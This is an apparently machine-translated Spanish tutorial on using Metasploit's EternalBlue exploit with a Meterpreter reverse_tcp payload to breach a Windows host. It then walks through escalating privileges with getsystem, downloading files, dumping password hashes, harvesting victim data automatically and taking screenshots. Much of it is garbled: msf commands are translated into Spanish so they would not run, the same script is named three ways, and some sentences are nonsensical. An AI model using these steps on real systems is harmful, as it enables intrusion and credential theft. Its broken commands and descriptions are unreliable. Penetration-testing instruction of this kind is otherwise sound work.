metasploit

Post explotación con Meterpreter

Post explotación con Meterpreter
Esta es una introducción al complemento de carga útil Meterpreter dentro de Metasploit. En este breve tutorial, discutiremos cómo usarlo para aplicar la explotación posterior a un sistema operativo WINDOWS una vez que ya lo haya violado utilizando el exploit Eternalblue. Nos limitaremos a acceder al sistema windows y explorarlo, y todas las cosas que vamos a hacer se centrarán en acceder a información y credenciales de usuario.

Introducción a Meterpreter

Meterpreter es una carga útil de ataque en el marco de Metasploit que permite al perpetrador controlar y navegar por la computadora de la víctima a través de un shell de comando. Puede resultar una herramienta muy versátil cuando se trata de pruebas de penetración.  Es una herramienta posterior a la explotación que se basa en la inyección de DLL en memoria, lo que significa que hace que la DLL inyectada se ejecute creando un nuevo proceso que pide al sistema que ejecute la DLL inyectada. Puede darle acceso a un shell de comando invisible en una máquina víctima, lo que le permite ejecutar ejecutables y redes de perfiles.

Fue escrito originalmente para Metasploit 2.xy se actualiza para Metasploit 3.

Discutiremos los usos de Meterpreter en detalle, pero antes de eso, hablemos sobre las cargas útiles en general

¿Qué son las cargas útiles??

Las cargas útiles en Metasploit son módulos, lo que significa que son fragmentos de códigos dentro de Metasploit que se ejecutan en el sistema remoto al que nos dirigimos. Primero se envía el módulo de explotación, que instala el módulo de carga útil en el sistema. Luego, la carga útil otorga acceso al atacante (restringido o completo, depende del contenido de la carga útil). Para profundizar en el funcionamiento de las cargas útiles, debemos discutir sus tipos, que son 3 en total:

Individual

Estas cargas útiles son completamente autónomas, lo que significa que pueden ser tan básicas como los códigos de control que permiten al usuario acceder a un sistema de destino.

Stagers

Los stagers son cargas útiles que recopilan aplicaciones dentro del sistema de destino y las envían al atacante. Establece la conexión entre la víctima y nuestra máquina local.

Etapas

Una vez que los stagers tienen acceso al sistema, descargan los módulos de etapas. Los módulos de etapas quitan la tapa de tamaño en el medidor.

Ejemplos de etapas serían un shell simple, shell 'ipwn' de iPhone, módulos Meterpreter, inyección VNC.

Puede calcular el tipo de carga útil calculando su nombre. Las cargas útiles individuales suelen tener el formato /

Explotación con Meterpreter

En primer lugar, inicie la consola msf escribiendo el siguiente comando de terminal en la ventana de terminal de Kali.

$ sudo msfconsole

Estamos usando reverse_tcp como escenario y Meterpreter como escenario.

Comenzaremos configurando el exploit Eternal Blue. Seleccione (ms17_010_eternalblue) y luego configure windows / x64 / meterpreter / reverse_tcp como la carga útil seleccionada

A continuación, configure los ajustes del exploit y luego ejecute el exploit con el comando exploit:

$ establecer carga útil windows / x64 / meterpreter / reverse_tcp
$ establecer rhost 192.168.198.136
$ explotar

La Hazaña de Eternalblue ha sido activado con éxito.

Post explotación

Accedemos y manipulamos el sistema ya comprometido durante la post-explotación.

Podemos hacer muchas cosas ahora que tenemos acceso al sistema, pero como se mencionó anteriormente, debemos permanecer enfocados principalmente en descargar información y obtener credenciales de usuario aquí

Administrar el privilegio de acceso:

Dependiendo del módulo de carga útil y el exploit que haya utilizado, es posible que se enfrente a ciertas restricciones de acceso que paralizarán gravemente sus habilidades para maniobrar la máquina víctima. Puede solucionar este problema con la escalada de privilegios eliminando contraseñas y alterando los registros. También puede escalar privilegios mediante el comando get system -command de Meterpreter.

$ getsystem
$ getuid

Transferencia de archivos con Meterpreter

Con Meterpreter, puede descargar un archivo usando el comando $ download-.

$ download / windows / system32 / drivers / etc / hosts

De manera similar, también puede cargar información en la máquina, usando $ upload- command

Extracción de credenciales de usuario:

Use el script de código credential_collector para extraer la información de las cuentas de usuario, o use el módulo de publicación de volcado de hash para un efecto similar.

Usaremos el módulo de publicación de volcado de hash para proceder a recolectar las credenciales. Escriba el siguiente comando msf.

$ ejecutar publicación / windows / reunir / hashdump

Como podemos ver, hemos obtenido las cuentas de administrador, invitado y Coen. El hash LM (administrador) y el hash NTLM (invitado) pertenecen a contraseñas vacías, mientras que el hash Coen es una contraseña que deberá descifrar. Puede hacerlo utilizando un descifrador de contraseñas.

Automatización del raspado del sistema

Puede ser tedioso recopilar información con declaraciones de entrada individuales que debe seguir alimentando el shell de comandos. Convenientemente, puede automatizar un poco este proceso con vineum-script. El script recopila información de la víctima y descarga los datos en nuestra máquina local. Se le dirá dónde se guarda la salida, como puede ver en la cuarta línea desde arriba:

$ ejecutar wineum

Tenga en cuenta que la ruta donde se almacena la salida de cada comando puede ser diferente de la que se muestra aquí.

Juguemos un poco más

Ejecutando archivos

Puede ejecutar cualquier archivo en el sistema usando: execute -f . Esto incluye tanto archivos ejecutables como programas con múltiples archivos de soporte. Por ejemplo, para ejecutar la aplicación de calculadora incorporada en el sistema operativo Windows, escriba ejecutar -f calc.exe

Tomando capturas de pantalla

También puede realizar capturas de pantalla desde el punto de vista del usuario. Simplemente escriba la captura de pantalla en el shell de comandos de Meterpreter y obtendrá una captura de pantalla de la pantalla en el sistema.

$ ejecutar -f calc.exe
$ captura de pantalla

Conclusión:

Esta ha sido una breve introducción al complemento Meterpreter en el marco de Metasploit, junto con una breve guía que muestra sus usos más básicos. Hemos aprendido aquí cómo podemos violar un sistema operativo Windows con el exploit Eternalblue para obtener acceso, luego usar Meterpreter para escalar privilegios, recopilar información manualmente y mediante el comando vineus- automatizado. También hemos aprendido a ejecutar archivos en la máquina víctima.

Meterpreter puede servir como un medio apreciable de detección de vulnerabilidades, a pesar de ser un conglomerado de herramientas básicas dentro del marco de Metasploit.

Vuelva a asignar los botones del mouse de manera diferente para diferentes programas con X-Mouse Button Control
Tal vez necesite una herramienta que pueda hacer que el control de su mouse cambie con cada aplicación que use. Si este es el caso, puede probar una a...
Revisión del mouse inalámbrico Microsoft Sculpt Touch
Recientemente leí sobre el Microsoft Sculpt Touch mouse inalámbrico y decidí comprarlo. Después de usarlo por un tiempo, decidí compartir mi experienc...
Trackpad en pantalla y puntero del mouse AppyMouse para tabletas Windows
Los usuarios de tabletas a menudo pierden el puntero del mouse, especialmente cuando son habituales para usar las computadoras portátiles. Los teléfon...